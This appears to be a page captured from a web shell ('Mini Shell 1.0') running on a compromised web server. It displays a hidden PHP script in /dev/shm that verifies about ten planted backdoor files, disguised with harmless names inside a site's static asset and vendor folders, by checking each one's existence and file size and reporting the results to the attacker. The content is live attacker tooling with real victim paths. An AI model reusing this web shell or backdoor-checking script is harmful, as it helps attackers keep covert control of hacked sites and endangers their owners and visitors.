HOME


Mini Shell 1.0
DIR: /proc/thread-self/root/dev/shm/
Upload File :
Current File : //proc/thread-self/root/dev/shm/.resource
<?php   $r = ''; $x = ["/home/cretmizm/hooksandhangers.cretxglobal.com/static/admin/js/vendor/xregexp/xoopscache.php"=>"bd@@6814@@536",
"/home/cretmizm/hooksandhangers.cretxglobal.com/static/admin/js/vendor/xregexp/confirm.php"=>"bd@@8622@@1065",
"/home/cretmizm/hooksandhangers.cretxglobal.com/static/admin/js/vendor/xregexp/AttrValidator.php"=>"bd@@15609@@538",
"/home/cretmizm/hooksandhangers.cretxglobal.com/static/admin/js/vendor/xregexp/fields_actions.php"=>"bd@@15119@@1019",
"/public/static/rest_framework/docs/css/assignment.php"=>"bd@@66379@@538",
"/static/main/assets/vendors/mdi/admin.modules.php"=>"bd@@66380@@2034",
"/static/main/assets/vendors/css/banner.addtable2.php"=>"bd@@66381@@653",
"/static/main/assets/vendors/chart.js/April04_schedule.php"=>"bd@@66382@@1584",
"/home/cretmizm/hooksandhangers.cretxglobal.com/static/admin/js/vendor/xregexp/elements.php"=>"bd@@14675@@538",
"/static/main/assets/images/faces-clipart/menu.mimes.php"=>"bd@@66383@@689"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');